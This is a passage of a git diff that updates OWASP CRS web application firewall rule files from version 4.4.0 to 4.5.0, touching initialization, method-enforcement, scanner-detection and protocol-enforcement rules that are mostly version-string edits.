(?:URLENCODED|MULTIPART|XML|JSON)" \ msg:'Enabling body inspection',\ tag:'OWASP_CRS',\ ctl:forceRequestBodyVariable=On,\ - ver:'OWASP_CRS/4.4.0'" + ver:'OWASP_CRS/4.5.0'" SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ "id:901350,\ phase:1,\ @@ -240,7 +240,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ noauditlog,\ msg:'Enabling forced body inspection for ASCII content',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ chain" SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ "ctl:requestBodyProcessor=URLENCODED" @@ -250,7 +250,7 @@ SecRule TX:sampling_percentage "@eq 100" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-SAMPLING" SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ "id:901410,\ @@ -260,7 +260,7 @@ SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ t:sha1,t:hexEncode,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ "id:901450,\ @@ -271,7 +271,7 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ tag:'OWASP_CRS',\ ctl:ruleRemoveByTag=OWASP_CRS,\ - ver:'OWASP_CRS/4.4.0'" + ver:'OWASP_CRS/4.5.0'" SecMarker "END-SAMPLING" SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \ "id:901500,\ @@ -282,4 +282,4 @@ SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \ log,\ msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0'" + ver:'OWASP_CRS/4.5.0'" diff --git a/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf index 71f93c1..0f13d76 100644 --- a/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf +++ b/rules/@owasp_crs/REQUEST-905-COMMON-EXCEPTIONS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -18,7 +18,7 @@ SecRule REQUEST_LINE "@streq GET /" \ tag:'platform-apache',\ tag:'attack-generic',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ @@ -35,7 +35,7 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ tag:'platform-apache',\ tag:'attack-generic',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ chain" SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \ "t:none,\ diff --git a/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf index c68d65e..48bf437 100644 --- a/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf +++ b/rules/@owasp_crs/REQUEST-911-METHOD-ENFORCEMENT.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ "id:911100,\ phase:1,\ @@ -23,13 +23,13 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/274',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" SecMarker "END-REQUEST-911-METHOD-ENFORCEMENT" diff --git a/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf b/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf index 4cd3213..eb8a8e7 100644 --- a/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf +++ b/rules/@owasp_crs/REQUEST-913-SCANNER-DETECTION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ "id:913100,\ phase:1,\ @@ -25,13 +25,13 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/224/541/310',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" SecMarker "END-REQUEST-913-SCANNER-DETECTION" diff --git a/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf index b33711a..6c07d3b 100644 --- a/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf +++ b/rules/@owasp_crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\x0b#]*)?(?:#[^\s\x0b]*)?|(?:connect (?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}\.?(?::[0-9]+)?|[\--9A-Z_a-z]+:[0-9]+)|options \*|[a-z]{3,10}[\s\x0b]+(?:[0-9A-Z_a-z]{3,7}?://[\--9A-Z_a-z]*(?::[0-9]+)?)?/[^#\?]*(?:\?[^\s\x0b#]*)?(?:#[^\s\x0b]*)?)[\s\x0b]+[\.-9A-Z_a-z]+)$" \ "id:920100,\ phase:1,\ @@ -23,7 +23,7 @@ SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\x0b#]*)?(?:#[^\s\x0b]*) tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegilnorsuz]acut|[aeiou]grav|[aino]tild)e|[c-elnr-tz]caron|(?:[cgklnr-t]cedi|[aeiouy]um)l|[aceg-josuwy]circ|[au]ring|a(?:mp|pos)|nbsp|oslash);|[^\"';=])*$" \ @@ -40,7 +40,7 @@ SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegilnorsuz]acut|[aeiou]grav|[a tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ @@ -57,7 +57,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ @@ -74,7 +74,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Content-Length "!@rx ^0?$" \ @@ -94,7 +94,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ @@ -114,7 +114,7 @@ SecRule REQUEST_PROTOCOL "!@within HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_METHOD "@streq POST" \ @@ -136,7 +136,7 @@ SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule &REQUEST_HEADERS:Content-Length "!@eq 0" \ @@ -157,7 +157,7 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule TX:2 "@lt %{tx.1}" \ @@ -176,7 +176,7 @@ SecRule REQUEST_HEADERS:Connection "@rx \b(?:keep-alive|close),\s?(?:keep-alive| tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" SecRule REQUEST_URI_RAW "@rx \x25" \ @@ -193,7 +193,7 @@ SecRule REQUEST_URI_RAW "@rx \x25" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_URI_RAW "@rx ^(.*)/(?:[^\?]+)?(\?.*)?$" \ @@ -217,7 +217,7 @@ SecRule REQUEST_BASENAME "!@rx ^.*%.*\.[^\s\x0b\.]+$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule TX:0 "@validateUrlEncoding" \ @@ -237,7 +237,7 @@ SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ chain" SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" \ @@ -257,7 +257,7 @@ SecRule REQUEST_URI|REQUEST_BODY "@rx (?i)%uff[0-9a-f]{2}" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \ @@ -274,7 +274,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-255" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule &REQUEST_HEADERS:Host "@eq 0" \ @@ -291,7 +291,7 @@ SecRule &REQUEST_HEADERS:Host "@eq 0" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}',\ skipAfter:END-HOST-CHECK" @@ -308,7 +308,7 @@ SecRule REQUEST_HEADERS:Host "@rx ^$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecMarker "END-HOST-CHECK" @@ -325,7 +325,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ @@ -346,7 +346,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ @@ -367,7 +367,7 @@ SecRule REQUEST_HEADERS:User-Agent "@rx ^$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ @@ -383,7 +383,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'NOTICE',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ @@ -404,7 +404,7 @@ SecRule REQUEST_HEADERS:Host "@rx (?:^([\d.]+|\[[\da-f:]+\]|[\da-f:]+)(:[\d]+)?$ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" SecRule &TX:MAX_NUM_ARGS "@eq 1" \ @@ -421,7 +421,7 @@ SecRule &TX:MAX_NUM_ARGS "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule &ARGS "@gt %{tx.max_num_args}" \ @@ -441,7 +441,7 @@ SecRule &TX:ARG_NAME_LENGTH "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" \ @@ -461,7 +461,7 @@ SecRule &TX:ARG_LENGTH "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule ARGS "@gt %{tx.arg_length}" \ @@ -481,7 +481,7 @@ SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" \ @@ -500,7 +500,7 @@ SecRule &TX:MAX_FILE_SIZE "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ @@ -522,7 +522,7 @@ SecRule &TX:COMBINED_FILE_SIZES "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" \ @@ -543,7 +543,7 @@ SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s?(?:action|bounda tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ @@ -562,7 +562,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.content_type=|%{tx.0}|',\ chain" @@ -585,7 +585,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.content_type_charset=|%{tx.1}|',\ chain" @@ -608,7 +608,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ tag:'PCI/12.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ @@ -626,7 +626,7 @@ SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ @@ -645,7 +645,7 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.extension=.%{tx.1}/',\ chain" @@ -667,7 +667,7 @@ SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'PCI/6.5.10',\ - 